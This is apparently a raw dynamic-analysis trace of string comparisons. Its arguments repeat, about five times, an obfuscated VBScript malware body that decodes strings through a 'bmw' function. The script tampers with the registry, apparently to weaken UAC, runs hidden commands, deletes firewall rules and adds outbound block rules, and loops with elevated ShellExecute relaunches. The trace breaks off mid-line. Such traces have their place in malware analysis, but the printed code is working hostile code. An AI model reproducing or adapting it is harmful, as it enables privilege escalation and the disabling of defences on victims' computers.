bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0222.998] wcsncmp (_String1="es\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.998] wcsncmp (_String1="s\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.998] wcsncmp (_String1="\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -26 [0222.999] wcsncmp (_String1="\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.999] wcsncmp (_String1="\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 